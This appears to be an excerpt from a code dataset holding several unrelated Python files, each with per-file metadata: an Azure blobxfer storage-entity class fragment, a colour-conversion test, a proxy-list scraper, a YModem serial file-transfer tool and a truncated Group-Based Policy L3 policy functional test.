:rtype: str
:return: access tier
"""
return self._access_tier
@access_tier.setter
def access_tier(self, value):
# type: (StorageEntity, str) -> None
"""Set access tier
:param StorageEntity self: this
:param str value: value
"""
self._access_tier = value
@property
def content_type(self):
# type: (StorageEntity) -> str
"""Return content type
:param StorageEntity self: this
:rtype: str
:return: content type
"""
return self._content_type
@content_type.setter
def content_type(self, value):
# type: (StorageEntity, str) -> None
"""Set content type
:param StorageEntity self: this
:param str value: value
"""
self._content_type = value
@property
def is_arbitrary_url(self):
# type: (StorageEntity) -> bool
"""Is an arbitrary URL
:param StorageEntity self: this
:rtype: bool
:return: arbitrary URL
"""
return self._is_arbitrary_url
def populate_from_blob(self, sa, blob, vio=None, store_raw_metadata=False):
# type: (StorageEntity, blobxfer.operations.azure.StorageAccount,
# azure.storage.blob.models.Blob) -> None
"""Populate properties from Blob
:param StorageEntity self: this
:param blobxfer.operations.azure.StorageAccount sa: storage account
:param azure.storage.blob.models.Blob blob: blob to populate from
:param blobxfer.models.metadata.VectoredStripe vio: Vectored stripe
:param bool store_raw_metadata: store raw metadata
"""
if store_raw_metadata:
self._raw_metadata = blob.metadata
else:
self._fileattr = blobxfer.models.metadata.fileattr_from_metadata(
blob.metadata)
self._vio = vio
self._can_create_containers = sa.can_create_containers
self._name = blob.name
self._snapshot = blob.snapshot
self._lmt = blob.properties.last_modified
self._size = blob.properties.content_length
self._md5 = blob.properties.content_settings.content_md5
self._cache_control = blob.properties.content_settings.cache_control
self._content_type = blob.properties.content_settings.content_type
if blob.properties.blob_type == BlobTypes.AppendBlob:
self._mode = StorageModes.Append
self._client = sa.append_blob_client
elif blob.properties.blob_type == BlobTypes.BlockBlob:
self._access_tier = blob.properties.blob_tier
self._mode = StorageModes.Block
self._client = sa.block_blob_client
elif blob.properties.blob_type == BlobTypes.PageBlob:
self._mode = StorageModes.Page
self._client = sa.page_blob_client
def populate_from_file(
self, sa, file, path, vio=None, store_raw_metadata=False,
snapshot=None):
# type: (StorageEntity, blobxfer.operations.azure.StorageAccount,
# azure.storage.file.models.File, str,
# blobxfer.models.metadata.VectoredStripe, bool, str) -> None
"""Populate properties from File
:param StorageEntity self: this
:param blobxfer.operations.azure.StorageAccount sa: storage account
:param azure.storage.file.models.File file: file to populate from
:param str path: full path to file
:param blobxfer.models.metadata.VectoredStripe vio: Vectored stripe
:param bool store_raw_metadata: store raw metadata
:param str snapshot: snapshot
"""
if store_raw_metadata:
self._raw_metadata = file.metadata
else:
self._fileattr = blobxfer.models.metadata.fileattr_from_metadata(
file.metadata)
self._vio = vio
self._can_create_containers = sa.can_create_containers
if path is not None:
self._name = str(pathlib.Path(path) / file.name)
else:
self._name = file.name
self._snapshot = snapshot
self._lmt = file.properties.last_modified
self._size = file.properties.content_length
self._md5 = file.properties.content_settings.content_md5
self._cache_control = file.properties.content_settings.cache_control
self._content_type = file.properties.content_settings.content_type
self._mode = StorageModes.File
self._client = sa.file_client
def populate_from_local(
self, sa, container, path, mode, cache_control, content_type):
# type: (StorageEntity, blobxfer.operations.azure.StorageAccount
# str, str, blobxfer.models.azure.StorageModes, str,
# str) -> None
"""Populate properties from local
:param StorageEntity self: this
:param blobxfer.operations.azure.StorageAccount sa: storage account
:param str container: container
:param str path: full path to file
:param blobxfer.models.azure.StorageModes mode: storage mode
:param str cache_control: cache control
:param str content_type: content type
"""
self._can_create_containers = sa.can_create_containers
self._container = container
self._name = path
self._mode = mode
self._cache_control = cache_control
self._content_type = content_type or blobxfer.util.get_mime_type(path)
self._from_local = True
if mode == StorageModes.Append:
self._client = sa.append_blob_client
elif mode == StorageModes.Block:
self._client = sa.block_blob_client
elif mode == StorageModes.File:
self._client = sa.file_client
elif mode == StorageModes.Page:
self._client = sa.page_blob_client
elif mode == StorageModes.Auto:
name = self.name.lower()
if name.endswith('.vhd') or name.endswith('.vhdx'):
self._client = sa.page_blob_client
self._mode = StorageModes.Page
else:
self._client = sa.block_blob_client
self._mode = StorageModes.Block
def populate_from_arbitrary_url(self, remote_path, size):
# type: (StorageEntity, str, int) -> None
"""Populate properties from an arbitrary url
:param StorageEntity self: this
:param str remote_path: remote path
:param int size: content length
"""
# fake a client
self._client = lambda: None
setattr(self._client, 'primary_endpoint', remote_path.split('/')[2])
# set attributes
self._is_arbitrary_url = True
self._container = None
self._name = remote_path
self._size = size
| 33.54371 | 79 | 0.622616 | 1,718 | 15,732 | 5.551222 | 0.135623 | 0.057041 | 0.073818 | 0.087239 | 0.473 | 0.35011 | 0.290972 | 0.223865 | 0.148474 | 0.118276 | 0 | 0.001982 | 0.294495 | 15,732 | 468 | 80 | 33.615385 | 0.857284 | 0.43599 | 0 | 0.270408 | 0 | 0 | 0.004114 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.163265 | false | 0 | 0.02551 | 0 | 0.336735 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a83fb50879060487859106ba5c544390d8e9a35d | 405 | py | Python | tests/color_manager_test.py | YouTwitFace/babi | 3697e931aefbe09178fc0441d403c5040ecfc4cd | [
"MIT"
] | 1 | 2020-06-29T11:37:47.000Z | 2020-06-29T11:37:47.000Z | tests/color_manager_test.py | apalyukha/babi | 3f259403fe2c8459321e3d89e123b2f5b379408f | [
"MIT"
] | null | null | null | tests/color_manager_test.py | apalyukha/babi | 3f259403fe2c8459321e3d89e123b2f5b379408f | [
"MIT"
] | null | null | null | import pytest
from babi.color import Color
from babi.color_manager import _color_to_curses
@pytest.mark.parametrize(
('color', 'expected'),
(
(Color(0x00, 0x00, 0x00), (0, 0, 0)),
(Color(0xff, 0xff, 0xff), (1000, 1000, 1000)),
(Color(0x1e, 0x77, 0xd3), (117, 466, 827)),
),
)
def test_color_to_curses(color, expected):
assert _color_to_curses(color) == expected
| 23.823529 | 54 | 0.639506 | 54 | 405 | 4.611111 | 0.444444 | 0.084337 | 0.156627 | 0.144578 | 0.208835 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133956 | 0.207407 | 405 | 16 | 55 | 25.3125 | 0.641745 | 0 | 0 | 0 | 0 | 0 | 0.032099 | 0 | 0 | 0 | 0.088889 | 0 | 0.076923 | 1 | 0.076923 | false | 0 | 0.230769 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a843101c221a512fefd60a227e47a0ad07e6f925 | 2,333 | py | Python | ipproxytool/spiders/proxy/gatherproxy.py | yzf233/IPProxyTool | 2775b1d73ef66899434eb134ab3bcd01b46e5d10 | [
"MIT"
] | 5 | 2017-07-21T09:44:33.000Z | 2021-08-08T16:27:45.000Z | ipproxytool/spiders/proxy/gatherproxy.py | haoyu311/IPProxyTool | eaf4c760879f93e3c56fb78f238a55a45ff78e82 | [
"MIT"
] | 3 | 2021-03-31T18:28:23.000Z | 2022-03-02T14:54:29.000Z | ipproxytool/spiders/proxy/gatherproxy.py | meihuanyu/rental | eb29b280c294defefefd56de5a8e32040c481f62 | [
"MIT"
] | 2 | 2018-06-28T14:47:08.000Z | 2018-06-29T09:50:07.000Z | # coding=utf-8
import json
import random
import re
import requests
from proxy import Proxy
from .basespider import BaseSpider
class GatherproxySpider(BaseSpider):
name = 'gatherproxy'
def __init__(self, *a, **kwargs):
super(GatherproxySpider, self).__init__(*a, **kwargs)
self.urls = [
'http://gatherproxy.com/',
'http://www.gatherproxy.com/proxylist/anonymity/?t=Anonymous',
'http://gatherproxy.com/proxylist/country/?c=China',
]
self.headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Host': 'www.gatherproxy.com',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0'
}
# self.proxies = self.get_proxy()
self.init()
def parse_page(self, response):
pattern = re.compile('gp.insertPrx\((.*?)\)', re.S)
items = re.findall(pattern, response.body)
for item in items:
data = json.loads(item)
#端口用的是十六进制
port = data.get('PROXY_PORT')
port = str(int(port, 16))
proxy = Proxy()
proxy.set_value(
ip = data.get('PROXY_IP'),
port = port,
country = data.get('PROXY_COUNTRY'),
anonymity = data.get('PROXY_TYPE'),
source = self.name,
)
self.add_proxy(proxy = proxy)
def get_proxy(self):
try:
url = 'http://127.0.0.1:8000/?name={0}'.format(self.name)
r = requests.get(url = url)
if r.text != None and r.text != '':
data = json.loads(r.text)
if len(data) > 0:
proxy = random.choice(data)
ip = proxy.get('ip')
port = proxy.get('port')
address = '%s:%s' % (ip, port)
proxies = {
'http': 'http://%s' % address
}
return proxies
except:
return None
| 31.527027 | 110 | 0.491642 | 253 | 2,333 | 4.466403 | 0.450593 | 0.042478 | 0.042478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028455 | 0.367338 | 2,333 | 73 | 111 | 31.958904 | 0.737127 | 0.022718 | 0 | 0 | 0 | 0.034483 | 0.239895 | 0.047891 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051724 | false | 0 | 0.103448 | 0 | 0.224138 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a844b552f292190f3c5fa040f3621afb025f7afe | 7,164 | py | Python | solutions/block_demo/.utility/python/transymodem.py | wstong999/AliOS-Things | 6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9 | [
"Apache-2.0"
] | null | null | null | solutions/block_demo/.utility/python/transymodem.py | wstong999/AliOS-Things | 6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9 | [
"Apache-2.0"
] | null | null | null | solutions/block_demo/.utility/python/transymodem.py | wstong999/AliOS-Things | 6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# version 1.0.1
import os
import sys
import re
import codecs
import time
import json
import argparse
import inspect
from ymodemfile import YModemfile
try:
import serial
from serial.tools import miniterm
from serial.tools.list_ports import comports
except:
print("\n\nNot found pyserial, please install: \nsudo pip install pyserial")
sys.exit(0)
def read_json(json_file):
data = None
if os.path.isfile(json_file):
with open(json_file, 'r') as f:
data = json.load(f)
return data
def write_json(json_file, data):
with open(json_file, 'w') as f:
f.write(json.dumps(data, indent=4, separators=(',', ': ')))
def ymodemTrans(serialport, filename):
def sender_getc(size):
return serialport.read(size) or None
def sender_putc(data, timeout=15):
return serialport.write(data)
sender = YModemfile(sender_getc, sender_putc)
sent = sender.send_file(filename)
def send_check_recv_data(serialport, pattern, timeout):
""" receive serial data, and check it with pattern """
matcher = re.compile(pattern)
tic = time.time()
buff = serialport.read(128)
while (time.time() - tic) < timeout:
buff += serialport.read(128)
if matcher.search(buff):
return True
return False
def download_file(portnum, baudrate, filepath):
# open serial port first
serialport = serial.Serial()
serialport.port = portnum
serialport.baudrate = baudrate
serialport.parity = "N"
serialport.bytesize = 8
serialport.stopbits = 1
serialport.timeout = 0.05
try:
serialport.open()
except Exception as e:
raise Exception("Failed to open serial port: %s!" % portnum)
# send handshark world for check amp boot mode
mylist = [0xA5]
checkstatuslist = [0x5A]
bmatched = False
shakehand = False
count = 0
reboot_count = 0
# step 1: check system status
for i in range(300):
serialport.write(serial.to_bytes(checkstatuslist))
time.sleep(0.1)
buff = serialport.read(2)
print(buff)
# case 1: input == output is cli or repl mode
if((buff) == b'Z'):
# print('Read data OK');
reboot_count += 1
else:
# not cli or repl mode is running mode
print("Please reboot the board manually.")
break
if(reboot_count >= 4):
# need reboot system
print("Please reboot the board manually.")
break
# step 2: wait reboot and hand shakend cmd
time.sleep(1)
bmatched = send_check_recv_data(serialport, b'amp shakehand begin...', 10)
# print(buff)
if bmatched:
print('amp shakehand begin...')
for i in range(300):
serialport.write(serial.to_bytes(mylist))
time.sleep(0.1)
buff = serialport.read(2)
print(buff)
if((buff) == b'Z'):
# print('Read data OK');
count += 1
if(count >= 4):
shakehand = True
if shakehand:
break
if i > 5:
print("Please reboot the board manually.")
break
else:
print("Please reboot the board manually, and try it again.")
serialport.close()
return
# start send amp boot cmd
time.sleep(0.1)
print("start to send amp_boot cmd")
cmd = 'amp_boot'
serialport.write(cmd.encode())
# serialport.write(b'amp_boot')
# send file transfer cmd
time.sleep(0.1)
# print("start to send file cmd")
# cmd = 'cmd_file_transfer\n'
# serialport.write(cmd.encode())
bmatched = send_check_recv_data(serialport, b'amp shakehand success', 2)
# serialport.write(b'cmd_flash_js\n')
# send file
if bmatched:
print("start to send file cmd")
cmd = 'cmd_file_transfer\n'
serialport.write(cmd.encode())
print('amp shakehand success')
time.sleep(0.1)
ymodemTrans(serialport, filepath)
print("Ymodem transfer file finish")
# send file transfer cmd
time.sleep(0.1)
print("send cmd exit")
cmd = 'cmd_exit\n'
serialport.write(cmd.encode())
else:
print('amp shakehand failed, please reboot the boaard manually')
# close serialport
serialport.close()
def get_downloadconfig():
""" get configuration from .config_burn file, if it is not existed,
generate default configuration of chip_haas1000 """
configs = {}
configs['chip_haas1000'] = {}
configs['chip_haas1000']['serialport'] = ''
configs['chip_haas1000']['baudrate'] = ''
configs['chip_haas1000']['filepath'] = ''
return configs['chip_haas1000']
def main2():
cmd_parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='''Run and transfer file to system.''',)
cmd_parser.add_argument('-d', '--device', default='',
help='the serial device or the IP address of the pyboard')
cmd_parser.add_argument(
'-b', '--baudrate', default=115200, help='the baud rate of the serial device')
cmd_parser.add_argument('files', nargs='*', help='input transfer files')
args = cmd_parser.parse_args()
print(args)
# download file
# step 1: set config
downloadconfig = get_downloadconfig()
# step 2: get serial port
if not downloadconfig["serialport"]:
downloadconfig["serialport"] = args.device
if not downloadconfig["serialport"]:
downloadconfig["serialport"] = miniterm.ask_for_port()
if not downloadconfig["serialport"]:
print("no specified serial port")
return
else:
needsave = True
# step 3: get baudrate
if not downloadconfig["baudrate"]:
downloadconfig["baudrate"] = args.baudrate
if not downloadconfig["baudrate"]:
downloadconfig["baudrate"] = "115200"
# step 4: get transfer file
if not downloadconfig["filepath"]:
downloadconfig["filepath"] = args.files
if not downloadconfig["filepath"]:
print('no file wait to transfer')
return
if os.path.isabs("".join(downloadconfig["filepath"])):
filepath = "".join(downloadconfig["filepath"])
print('the filepath is abs path')
else:
basepath = os.path.abspath('.')
filepath = basepath + '/' + "".join(downloadconfig["filepath"])
print('the filepath is not abs path')
print("serial port is %s" % downloadconfig["serialport"])
print("transfer baudrate is %s" % downloadconfig["baudrate"])
# print(base_path(downloadconfig["filepath"]))
print("filepath is %s" % filepath)
# print("the settings were restored in the file %s" % os.path.join(os.getcwd(), '.config_burn'))
# step 3: download file
download_file(downloadconfig["serialport"],
downloadconfig['baudrate'], filepath)
if __name__ == "__main__":
main2()
| 28.887097 | 100 | 0.61139 | 848 | 7,164 | 5.082547 | 0.253538 | 0.031323 | 0.030858 | 0.015313 | 0.24942 | 0.22877 | 0.19652 | 0.123202 | 0.112529 | 0.068213 | 0 | 0.019238 | 0.274428 | 7,164 | 247 | 101 | 29.004049 | 0.809927 | 0.144472 | 0 | 0.271084 | 0 | 0 | 0.183119 | 0 | 0 | 0 | 0.001316 | 0 | 0 | 1 | 0.054217 | false | 0 | 0.072289 | 0.012048 | 0.180723 | 0.13253 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a847a591509f4396879b2e583da9a1dc7831b69f | 19,282 | py | Python | gbpservice/tests/contrib/gbpfunctests/testcases/tc_gbp_l3p_func.py | baodongli/group-based-policy | f3b892ecdc1051b204376e18679f73bf457ce7dc | [
"Apache-2.0"
] | null | null | null | gbpservice/tests/contrib/gbpfunctests/testcases/tc_gbp_l3p_func.py | baodongli/group-based-policy | f3b892ecdc1051b204376e18679f73bf457ce7dc | [
"Apache-2.0"
] | null | null | null | gbpservice/tests/contrib/gbpfunctests/testcases/tc_gbp_l3p_func.py | baodongli/group-based-policy | f3b892ecdc1051b204376e18679f73bf457ce7dc | [
"Apache-2.0"
] | 1 | 2019-12-03T15:28:24.000Z | 2019-12-03T15:28:24.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import commands
import logging
import platform
import sys
from libs import config_libs
from libs import utils_libs
from libs import verify_libs
def main():
# Run the Testcases:
test = test_gbp_l3p_func()
if test.test_gbp_l3p_func_1() == 0:
test.cleanup(tc_name='TESTCASE_GBP_L3P_FUNC_1')
if test.test_gbp_l3p_func_2() == 0:
test.cleanup(tc_name='TESTCASE_GBP_L3P_FUNC_2')
if test.test_gbp_l3p_func_3() == 0:
test.cleanup(tc_name='TESTCASE_GBP_L3P_FUNC_3')
if test.test_gbp_l3p_func_4() == 0:
test.cleanup(tc_name='TESTCASE_GBP_L3P_FUNC_4')
test.cleanup()
utils_libs.report_results('test_gbp_l3p_func', 'test_results.txt')
sys.exit(1)
class test_gbp_l3p_func(object):
# Initialize logging
logging.basicConfig(
format='%(asctime)s [%(levelname)s] %(name)s - %(message)s',
level=logging.WARNING)
_log = logging.getLogger(__name__)
cmd = 'rm /tmp/test_gbp_l3p_func.log'
commands.getoutput(cmd)
hdlr = logging.FileHandler('/tmp/test_gbp_l3p_func.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
_log.addHandler(hdlr)
_log.setLevel(logging.INFO)
_log.setLevel(logging.DEBUG)
def __init__(self):
"""
Init def
"""
self._log.info("\n## START OF GBP L3_POLICY FUNCTIONALITY TESTSUITE\n")
self.gbpcfg = config_libs.Gbp_Config()
self.gbpverify = verify_libs.Gbp_Verify()
self.l3p_name = 'demo_l3p'
self.l2p_name = 'demo_l2p'
def cleanup(self, tc_name=''):
if tc_name != '':
self._log.info('## %s: FAILED' % (tc_name))
for obj in ['group', 'l2p', 'l3p']:
self.gbpcfg.gbp_del_all_anyobj(obj)
def test_gbp_l3p_func_1(
self,
name_uuid='',
l3p_uuid='',
rep_cr=0,
rep_del=0):
if rep_cr == 0 and rep_del == 0:
self._log.info(
"\n########################################################\n"
"TESTCASE_GBP_L3P_FUNC_1: TO CREATE/VERIFY/DELETE/VERIFY a "
"L3POLICY with DEFAULT ATTRIB VALUE\n"
"TEST_STEPS::\n"
"Create L3 Policy Object\n"
"Verify the attributes & value, show & list cmds\n"
"Verify the implicit neutron objects\n"
"Delete L3 Policy Object\n"
"Verify that PR and implicit neutron objects has got "
"deleted, show & list cmds\n"
"##########################################################\n")
if name_uuid == '':
name_uuid = self.l3p_name
# Testcase work-flow starts
if rep_cr == 0 or rep_cr == 1:
self._log.info(
'\n## Step 1: Create L3Policy with default attrib vals##\n')
l3p_uuid = self.gbpcfg.gbp_policy_cfg_all(1, 'l3p', name_uuid)
if l3p_uuid == 0:
self._log.info("\n## Step 1: Create L3Policy == Failed")
return 0
# default subnet= 10.0.0.0/8 & subnet_prefix_length= 24
self._log.info('# Step 2A: Verify L3Policy using -list cmd')
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
0, 'l3p', l3p_uuid, name_uuid, '10.0.0.0/8', '24') == 0:
self._log.info(
"\n## Step 2A: Verify L3Policy using -list option "
"== Failed")
return 0
self._log.info('# Step 2B: Verify L3Policy using -show cmd')
if 'Ubuntu' in platform.linux_distribution(): # Only for devstack
rtr_uuid = self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
l3p_uuid,
ret='default',
id=l3p_uuid,
name=name_uuid,
ip_pool='10.0.0.0/8',
subnet_prefix_length='24',
ip_version='4')
if rtr_uuid != 0 and isinstance(rtr_uuid, str):
rtr_name = 'l3p_%s' % (name_uuid)
if self.gbpverify.neut_ver_all(
'router',
rtr_uuid,
name=rtr_name,
admin_state_up='True',
status='ACTIVE') == 0:
self._log.info(
"\n## Step 2D: Verify L3Policy using -show "
"option == Failed")
return 0
else:
self._log.info(
"\n## Step 2C: Verify L3Policy using -show "
"option == Failed")
return 0
else:
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
l3p_uuid,
id=l3p_uuid,
name=name_uuid,
ip_pool='10.0.0.0/8',
subnet_prefix_length='24',
ip_version='4') == 0:
self._log.info(
"\n## Step 2C: Verify L3Policy using -show "
"option == Failed")
return 0
#######
if rep_del == 0 or rep_del == 1:
self._log.info('\n## Step 3: Delete L3Policy using name ##\n')
if self.gbpcfg.gbp_policy_cfg_all(0, 'l3p', name_uuid) == 0:
self._log.info("\n## Step 3: Delete L3Policy == Failed")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
0, 'l3p', name_uuid, l3p_uuid) != 0:
self._log.info(
"\n## Step 3A: Verify L3Policy is Deleted using "
"-list option == Failed")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1, 'l3p', name_uuid, l3p_uuid) != 0:
self._log.info(
"\n## Step 3B: Verify L3Policy is Deleted using "
"-show option == Failed")
return 0
if rep_cr == 0 and rep_del == 0:
self._log.info("\n## TESTCASE_GBP_L3P_FUNC_1: PASSED")
return 1
def test_gbp_l3p_func_2(self):
self._log.info(
"\n############################################################\n"
"TESTCASE_GBP_L3P_FUNC_2: TO CREATE/UPDATE/DELETE/VERIFY a "
"L3POLICY with EDITABLE ATTRs\n"
"TEST_STEPS::\n"
"Create L3Policy Object with non-default params\n"
"Verify the attributes & value, show & list cmds\n"
"Update the L3Policy Objects\n"
"Verify the attributes & value, show & list cmds\n"
"Delete L3Policy using Name\n"
"Verify that L3P has got deleted, show & list cmds\n"
"##############################################################\n")
# Testcase work-flow starts
self._log.info(
"\n## Step 1: Create Policy L3Policy with non-default "
"attrs and values ##")
l3p_uuid = self.gbpcfg.gbp_policy_cfg_all(
1, 'l3p', self.l3p_name, ip_pool='20.20.0.0/24',
subnet_prefix_length='28')
if l3p_uuid == 0:
self._log.info("\n## Step 1: Create L3Policy == Failed")
return 0
self._log.info('\n## Step 2B: Verify L3Policy using -show cmd')
if 'Ubuntu' in platform.linux_distribution(): # Only for devstack
rtr_uuid = self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
l3p_uuid,
ret='default',
id=l3p_uuid,
name=self.l3p_name,
ip_pool='20.20.0.0/24',
subnet_prefix_length='28',
ip_version='4')
if rtr_uuid != 0 and isinstance(rtr_uuid, str):
rtr_name = 'l3p_%s' % (self.l3p_name)
if self.gbpverify.neut_ver_all(
'router',
rtr_uuid,
name=rtr_name,
admin_state_up='True',
status='ACTIVE') == 0:
self._log.info(
"\n## Step 2D: Verify L3Policy using -show option"
" == Failed")
return 0
else:
self._log.info(
"\n## Step 2C: Verify L3Policy using -show option"
" == Failed")
return 0
else:
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
l3p_uuid,
id=l3p_uuid,
name=self.l3p_name,
ip_pool='20.20.0.0/24',
subnet_prefix_length='28',
ip_version='4') == 0:
self._log.info(
"\n## Step 2C: Verify L3Policy using -show option"
" == Failed")
if self.gbpcfg.gbp_policy_cfg_all(
2, 'l3p', self.l3p_name, subnet_prefix_length='26') == 0:
self._log.info(
"\n## Step 3: UPdating L3Policy attributes == Failed")
return 0
self._log.info(
"\n## Step 3: Verify that Updated Attributes in L3Policy")
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
self.l3p_name,
id=l3p_uuid,
name=self.l3p_name,
ip_pool='20.20.0.0/24',
subnet_prefix_length='26',
ip_version='4') == 0:
self._log.info(
"\n## Step 3: Verify L3Policy using -show option == Failed")
self.test_gbp_l3p_func_1(name_uuid=l3p_uuid, rep_cr=2)
self._log.info("\n## TESTCASE_GBP_L3P_FUNC_2: PASSED")
return 1
def test_gbp_l3p_func_3(self):
self._log.info(
"\n############################################################\n"
"TESTCASE_GBP_L3P_FUNC_3: TO CREATE/UPDATE/DELETE/VERIFY "
"L3POLICY AND ASSOCIATED L2POLICY\n"
"TEST_STEPS::\n"
"Create L3Policy with defined attributes\n"
"Create L2Policy with default attributes\n"
"Update L2Policy to change the from default to the above "
"non-default L3Policy\n"
"Verify the Update of L3Policy attribute of L2Policy fails\n"
"Update L3Policy(default) editable attributes\n"
"Delete the L2Policy(this causes auto-delete of default-L3Pol)\n"
"Verify L3/L2Policies successfully deleted\n"
"##############################################################\n")
# Testcase work-flow starts
# Create L2 L3 Policy
self._log.info(
"\n## Step 1: Create L3Policy with non-default attrs and "
"values ##")
l3p_uuid = self.gbpcfg.gbp_policy_cfg_all(
1, 'l3p', self.l3p_name, ip_pool='20.20.0.0/24',
subnet_prefix_length='28',
proxy_ip_pool='192.167.0.0/16')
if l3p_uuid == 0:
self._log.info("\n## Step 1: Create L3Policy == Failed")
return 0
self._log.info(
'\n## Step 1A: Create L2Policy with default attributes##\n')
l2p = self.gbpcfg.gbp_policy_cfg_all(1, 'l2p', self.l2p_name)
if l2p == 0:
self._log.info(
"\n## New L2Policy Create Failed, hence "
"Testcase_gbp_l3p_func_3 ABORTED\n")
return 0
elif len(l2p) < 2:
self._log.info(
"\n## New L2Policy Create Failed due to "
"unexpected tuple length\n")
return 0
else:
l2p_uuid, def_l3p_uuid = l2p[0], l2p[1]
# Associating L2Policy with non-default L3Policy(should Fail) and
# UPdating the L3Policy(in-use/default)
if self.gbpcfg.gbp_policy_cfg_all(
2, 'l2p', self.l2p_name, l3_policy_id=l3p_uuid) != 0:
self._log.info(
"\n## Updating/Changing L3Policy attribute of "
"L2Policy did NOT Fail")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1, 'l2p', self.l2p_name, l3_policy_id=def_l3p_uuid) == 0:
self._log.info(
"\n## Step 3A: Verify L2Policy is still associated to "
"its default L3Policy == Failed")
return 0
if self.gbpcfg.gbp_policy_cfg_all(
2, 'l3p', def_l3p_uuid, subnet_prefix_length='27') == 0:
self._log.info(
"\n## Step 4: UPdating default L3Policy's "
"attributes == Failed")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
def_l3p_uuid,
id=def_l3p_uuid,
ip_pool='10.0.0.0/8',
l2_policies=l2p_uuid,
subnet_prefix_length='27',
ip_version='4') == 0:
self._log.info(
"\n## Step 4A: Verify L3Policy after associating "
"to the L2Policy == Failed")
return 0
# Delete L2/L3 Policies
if self.gbpcfg.gbp_policy_cfg_all(0, 'l2p', l2p_uuid) == 0:
self._log.info("\n## Step 5: Delete L2Policy == Failed")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(1, 'l2p', l2p_uuid) != 0:
self._log.info("\n## Step 5A: Verify Delete of L2Policy == Failed")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(1, 'l3p', def_l3p_uuid) != 0:
self._log.info(
"\n## Step 5B: Verify Auto-Delete of default "
"L3Policy == Failed")
return 0
self._log.info("\n## TESTCASE_GBP_L3P_FUNC_3: PASSED")
return 1
def test_gbp_l3p_func_4(self):
self._log.info(
"\n############################################################\n"
"TESTCASE_GBP_L3P_FUNC_4: TO CREATE/UPDATE/DELETE/VERIFY "
"MULTI L2POLICY to SINGLE L3POLICY\n"
"TEST_STEPS::\n"
"Create non-default L3Policy with defined attributes\n"
"Create Multiple L2Policies with above non-default L3policy\n"
"Verify that L2Policies are created with non-default L3Policy\n"
"Delete all L2 Policies\n"
"Verify that non-default L3 Policy exists but with null "
"L2Policies\n"
"Delete the L3Policy\n"
"Verify L3/L2Policys successfully deleted\n"
"##############################################################\n")
# Testcase work-flow starts
# Create and Verify non-default L3 Policy
self._log.info(
"\n## Step 1: Create Policy L3Policy with non-default "
"attrs and values ")
l3p_uuid = self.gbpcfg.gbp_policy_cfg_all(
1, 'l3p', self.l3p_name, ip_pool='40.50.0.0/16',
subnet_prefix_length='25')
if l3p_uuid == 0:
self._log.info("\n## Step 1: Create L3Policy == Failed")
return 0
if self.gbpverify.gbp_l2l3ntk_pol_ver_all(
1,
'l3p',
l3p_uuid,
id=l3p_uuid,
name=self.l3p_name,
ip_pool='40.50.0.0/16',
subnet_prefix_length='25',
ip_version='4') == 0:
self._log.info("\n## Step 1A: Verify non-default == Failed")
return 0
# Create and verify multiple L2 policy with above non-default L3P
self._log.info(
"\n## Step 2: Create and Verify multiple(n=10) L2Policy "
"associated with 1 non-default L3P")
l2p_uuid_list = []
n, i = 11, 1
while i < n:
l2p_name = 'demo_l2p_%s' % (i)
